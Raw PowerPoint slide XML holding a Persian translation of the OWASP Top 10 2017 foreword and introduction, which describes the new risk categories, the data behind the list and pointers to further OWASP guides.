                      <a:endParaRPr lang="fa-IR" sz="950" b="0" baseline="0"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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0"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Acknowledgements page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="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pPr rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیشگفتار</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2400" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیش گفتار</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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3828403495"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939601"/>
          <a:ext cx="6858000" cy="9090828"/>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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> خوش آمدید!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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753388">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="just" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>آپدیت کلی چند موضع جدید</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> را اضافه کرده، موضوعات جدید شامل دو موضوع انتخاب توسط جامعه است – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>A10:2017- Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>. دو تفاوت کلیدی با نسخه قبلی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> هستند که مورد توجه بازخورد </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>community</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> و داده‌های جمع آوری شده از ده‌ها سازمان، احتمالا بزرگترین میزان داده‌ای است که تاکنون برای تهیه یک استاندارد امنیتی جمع‌آوری شده است. که به ما اطمینان می‌دهد </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> جدید مهم‌ترین ریسک‌های امنیتی برنامه‌ها که سازمان‌ها با آن مواجه هستند را پوشش داده.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP Top 10-2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ابتدا برپایه پیش از 40 گزارشی است که شرکت‌هایی که در زمینه امنیت برنامه فعال هستند و یک مرور در صنعت که ما روی 500 مورد انجام داده‌ایم. این داده شامل آسیب‌پذیری‌های جمع آوری شده از صدها سازمان و بیش از 100 هزار برنامه و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> دنیای واقعی هستند. 10 آیتم برتر با انتخاب و اهمیت دادن این داده‌های متداول در ترکیب با اجماع سنسورهای تخمین احتمال اکسپلویت شدن، قابلیت کشف و تاثیر.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>هدف اصلی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> آموزش توسعه دهنده‌گان، طراحان، معماران، مدیران و سازمان‌ها درباره عواقب آسیب‌پذیری‌های سایع و مهم برنامه‌های وب است. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> تکنیک‌های پایه برای محافظت دربرابر مشکلات مناطق با ریسک بالا و راهنمایی برای خروج از آن است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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22481544"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4097905"/>
          <a:ext cx="3352800" cy="7606920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="324000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>نقشه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> راه برای فعالیت‌های آینده</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200"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5468516">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>به</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>10 بسنده نکنید.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" b="1" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>صدها مشکل وجود دارند که میتوانند امنیت کلی وب اپلیکیشن را تحت تاثیر قراردهند ، مطابق چیزی که در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>راهنمای توسعه دهنده </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t> و مجموعه کدهای تقلب</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> مورد بحث قرار گرفته اند. این مطالعات برای کسانی که وب اپلیکیشن یا </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> توسعه میدهند ضروری هستند.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>راهنمایی در این مورد که چگونه به طور موثر در وب اپلیکیشن ها و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ها ، آسیب پذیری پیدا کنیم در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>راهنمای تست </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
